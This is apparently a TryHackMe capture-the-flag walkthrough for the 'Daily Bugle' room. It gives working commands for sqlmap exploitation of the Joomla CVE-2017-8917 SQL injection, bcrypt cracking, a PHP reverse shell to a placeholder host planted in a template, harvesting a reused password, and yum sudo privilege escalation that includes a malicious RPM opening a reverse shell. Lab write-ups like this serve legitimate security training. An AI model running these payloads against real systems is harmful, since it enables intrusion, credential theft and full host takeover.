Daily Bugle | TryHackMe Walkthroughs

Daily Bugle is a hard-rated room featuring Joomla CMS exploitation via SQL injection, hash cracking, and yum privilege escalation. Named after Spider-Man's newspaper, this box teaches advanced enumeration and exploitation.

This room requires patience with SQLMap and understanding of CMS vulnerabilities. J. Jonah Jameson would be furious about these security holes!

Reconnaissance

Start with comprehensive service enumeration:

bash

1606070;"># Initial port scan
2nmap -sV -sC -p- TARGET_IP
3606070;"># Results:
4606070;"># 22/tcp   - SSH
5606070;"># 80/tcp   - HTTP (Apache)
6606070;"># 3306/tcp - MySQL
7 
8606070;"># Web enumeration
9gobuster dir -u http:606070;">//TARGET_IP -w /usr/share/wordlists/dirb/common.txt
10606070;"># Found: /administrator, /images, /templates, /modules

The website is running Joomla CMS. Let's identify the exact version:

bash

1606070;"># Joomla version detection
2curl http:606070;">//TARGET_IP/administrator/manifests/files/joomla.xml | grep version
3606070;"># or check /README.txt
4 
5606070;"># Using joomscan for comprehensive scan
6joomscan -u http:606070;">//TARGET_IP
7606070;"># Joomla 3.7.0 detected - vulnerable to SQL injection!

Joomla SQL Injection

Joomla 3.7.0 is vulnerable to CVE-2017-8917 - SQL injection in the com_fields component. This affects the core CMS, not a plugin!

bash

1606070;"># Search for exploit
2searchsploit joomla 3.7
3606070;"># Joomla! 3.7.0 - 'com_fields' SQL Injection
4 
5606070;"># Method 1: Manual SQLMap
6sqlmap -u 606070;">#a5d6ff;">"http://TARGET_IP/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
7 
8606070;"># Enumerate database
9sqlmap -u 606070;">#a5d6ff;">"http://TARGET_IP/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomla --tables
10 
11606070;"># Dump users table
12sqlmap -u 606070;">#a5d6ff;">"http://TARGET_IP/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomla -T '#__users' --dump

SQLMap Tips

SQLMap can take a long time. Use --threads=10 to speed up, but be careful not to crash the target. The #__users table contains admin credentials!

From the dump, you'll find:

1606070;"># User found:
2Username: jonah
3Email: jonah@tryhackme.com
4Password: $2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm
5 
6606070;"># This is a bcrypt hash - crack it!

Hash Cracking

bash

1606070;"># Save hash to file
2echo 606070;">#a5d6ff;">'$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm' > hash.txt
3 
4606070;"># Identify hash type
5hashid hash.txt
6606070;"># bcrypt (mode 3200 in hashcat)
7 
8606070;"># Crack with hashcat
9hashcat -m 3200 hash.txt /usr/share/wordlists/rockyou.txt
10 
11606070;"># Or with john
12john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=bcrypt
13 
14606070;"># Password found: spiderman123

Bcrypt hashes are slow to crack by design. This can take several minutes even with a good GPU. Perfect time to grab coffee!

Getting a Shell

Joomla Admin to Shell

Login to Admin PanelAccess /administrator and login with jonah:spiderman123

Navigate to TemplatesExtensions → Templates → Templates

Edit Template FileSelect Protostar → error.php (or index.php)

Inject Reverse ShellReplace content with PHP reverse shell

Trigger ShellVisit a non-existent page to trigger error.php, or visit /templates/protostar/index.php

bash

1606070;"># Start listener
2nc -lvnp 4444
3 
4606070;"># PHP reverse shell (insert in template)
5<?php
6exec(606070;">#a5d6ff;">"/bin/bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'");
7?>
8 
9606070;"># Trigger: visit http://TARGET_IP/templates/protostar/error.php
10606070;"># Shell received as apache user!

Lateral Movement

The apache user has limited privileges. Look for credentials:

bash

1606070;"># Stabilize shell
2python -c 606070;">#a5d6ff;">'import pty;pty.spawn("/bin/bash")'
3export TERM=xterm
4 
5606070;"># Check Joomla configuration
6cat /var/www/html/configuration.php
7606070;"># Database credentials found!
8 
9606070;"># Look for users
10cat /etc/passwd | grep -v nologin
11606070;"># Found: jjameson
12 
13606070;"># Check Joomla config for passwords
14grep -i password /var/www/html/configuration.php
15606070;"># public $password = 'nv5uz9r3ZEDzVjNu';
16 
17606070;"># Try password reuse
18su jjameson
19Password: nv5uz9r3ZEDzVjNu
20606070;"># Success!
21 
22cat /home/jjameson/user.txt

Privilege Escalation - Yum

bash

1606070;"># Check sudo permissions
2sudo -l
3606070;"># (root) NOPASSWD: /usr/bin/yum
4 
5606070;"># Yum can run commands via plugins!

GTFOBins

Always check GTFOBins for sudo binaries. Yum has a well-documented privilege escalation path using custom plugins.

bash

1606070;"># Method 1: Spawn shell via yum
2TF=$(mktemp -d)
3cat >$TF/x<<EOF
4[main]
5plugins=1
6pluginpath=$TF
7pluginconfpath=$TF
8EOF
9 
10cat >$TF/y.conf<<EOF
11[main]
12enabled=1
13EOF
14 
15cat >$TF/y.py<<EOF
16import os
17import yum
18from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
19requires_api_version=606070;">#a5d6ff;">'2.1'
20def init_hook(conduit):
21    os.execl(606070;">#a5d6ff;">'/bin/sh','/bin/sh')
22EOF
23 
24sudo yum -c $TF/x --enableplugin=y
25606070;"># Root shell!
26 
27606070;"># Method 2: Simpler approach
28sudo yum localinstall -y /dev/stdin <<< 'Summary: pwned
29Name: pwned
30Version: 1
31Release: 1
32License: GPL
33Group: System Environment/Base
34 
35%post
36/bin/bash -i >& /dev/tcp/YOUR_IP/5555 0>&1
37 
38%description
39Malicious package for privesc
40 
41%files'

bash

1606070;"># Get root flag
2cat /root/root.txt

Knowledge Check

Quick Quiz

Question 1 of 2

What CVE affects Joomla 3.7.0?

Key Takeaways

Joomla version detection reveals exploitable vulnerabilities
CMS admin panels allow template editing for shell injection
Configuration files often contain reusable passwords
Package managers (yum, apt) with sudo can be exploited via plugins
GTFOBins is essential for sudo privilege escalation research

Related Lessons

Internal

SQL Injection Fundamentals

Sudo Exploitation